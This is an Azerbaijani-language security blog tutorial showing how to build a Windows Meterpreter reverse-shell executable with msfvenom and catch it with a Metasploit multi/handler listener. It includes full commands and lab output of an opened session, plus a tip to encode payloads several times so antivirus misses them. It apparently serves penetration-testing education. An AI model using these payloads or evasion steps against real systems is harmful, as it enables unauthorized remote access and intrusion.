Salam hər vaxtınız xeyir dəyərli oxucular, bu gün Exploit edilmə başlığı altında bizə lazım olacaq Metasploit framework istifadə edilməsini öyrənəcəyik.Burada Metasploit listener və msfvenom modulları ilə payload yaradılmasını nəzər yetirəcəyik.
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Metasploit framework-dan istifadə
Biz əvvəlki paylaşımda reverse shell ilə hədəf sistemdən bizə reverse shell əldə etmək üçün kommandaları ilə tanış olduq.Bütün bu müxtəlif proqramlaşdırma dillərində yazılmış kommandaları dəstəkləmək mümkün deyildir.Məhz bu problemi aradan qaldırmaq üçün Metasploit/MSFvenom alətindən istifadə edəcəyik. (Reverse shell kommandaları aşağıda linkdən baxa bilərsiniz)
https://xaker.az/2025/04/10/reverse-shell-kommandalari-reverse-shell-cheatsheet/: Metasploit framework istifadə edilməsiBiz hədəf sistemdən uğurlu Meterpreter shell əldə etmək istəyiriksə aşağıdakı iki əsas nüansa fikir verməliyik.(Meterpreter Metasploit framwork ilə əldə olunan shelldir və digər shelllərdən daha ətraflıdır.)
- MSFvenom ilə payload yaratmaq
- Metaspoit alətində listener yaratmaq
Bu əməliyyatları necə baş verdiyini başa düşmək üçün əvvəlcə praktiki yerinə yetirək.Bizim məsələmizdə MSFvenom modullunun köməyi ilə Windows/Meterpreter payloadı yaradırıq.(LHOST- Kali cihazımızın ip adresidir, LPORT – bizim qulaq asmaq istədiyimiz portdur.):
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.16 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Sonra biz bu port üzərindən hədəfdən bizə gələcək bağlantıları dinləyəcəyik və multi/handler modulundan istifadə edəcəyik:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST eth0
LHOST => 192.168.10.16
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.10.16:4444
Bizim Kali Linux cihazında edəcəyimiz bir iş qalmadı, indi isə yaratdığımız payload shell.exe hədəf sistem olan Windows sistemə ötürək və icra edək.Həmin payload icra olunarkən bizdə Meterpreter shell əldə etməliyik.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.10.16:4444
[*] Sending stage (177734 bytes) to 192.168.10.37
[*] Meterpreter session 1 opened (192.168.10.16:4444 -> 192.168.10.37:49457) at 2025-04-11 22:02:54 +0400
meterpreter > sysinfo
Computer : VAGRANT-2008R2
OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : tr_TR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
Gələcək paylaşımlarda biz bu mərhələdən sonra səlahiyyətlərin artırılması və pivoting işlərini yerinə yetirməyi öyrənəcəyik.
MSFvenom parametrləri
MSFvenom aləti ilə daha profesional davranmaq üçün onun parametrlərini araşdırmalıyıq.Onun tipik olaraq şablonu aşağıdakı kimidir:
msfvenom -p (payload adı) -platform (ƏS) -e (kodlama) -f (format) -out (hansı adda yadda saxlanılacaq)
MSFvenom alətinin bazasında yerləşən bütün payloadları siyahılamaq üçün aşağıdakı kommandadan istifadə edin:( grep kommandası ilə filtrləmə yerinə yetirə bilərsiniz)
msfvenom -l payloads
MSFvenom alətinin bazasında yerləşən bütün platformaları siyahılamaq üçün aşağıdakı kommandadan istifadə edin:( grep kommandası ilə filtrləmə yerinə yetirə bilərsiniz)
msfvenom -l platforms
MSFvenom alətinin bazasında yerləşən bütün kodlaşdırıcıları siyahılamaq üçün aşağıdakı kommandadan istifadə edin:( grep kommandası ilə filtrləmə yerinə yetirə bilərsiniz)
msfvenom -l encoders
Biz payloadlarımızı daha da antivirus tərəfindən tanınmaması üçün bir neçə dəfə kodlaşdıra(encode) edə bilərik.Bu antivirusları əsaslı dərəcədə aldada bilməsədə yoxlamaq həmişə daha yaxşıdır.Payloadı bir neçə dəfə kodlaşdırmaq üçün -i parametrindən istifadə edə bilərsiniz.
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3
Nəhayət MSFvenom bazasında yerləşən bütün dəstəklənən formatları aşağıdakı kommanda ilə görə bilərik.
msfvenom --help-formats
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat